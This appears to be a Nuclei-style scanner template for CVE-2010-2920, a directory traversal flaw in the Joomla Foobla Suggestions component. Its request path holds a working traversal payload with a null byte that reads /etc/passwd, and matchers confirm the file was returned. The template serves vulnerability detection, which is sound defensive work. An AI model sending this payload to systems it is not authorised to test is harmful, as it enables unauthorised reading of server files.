id: CVE-2010-2920 info: name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12120 - https://www.cvedetails.com/cve/CVE-2010-2920 - http://www.vupen.com/english/advisories/2010/1844 remediation: Upgrade to a supported version. classification: cve-id: CVE-2010-2920 tags: cve,cve2010,joomla,lfi,edb requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/17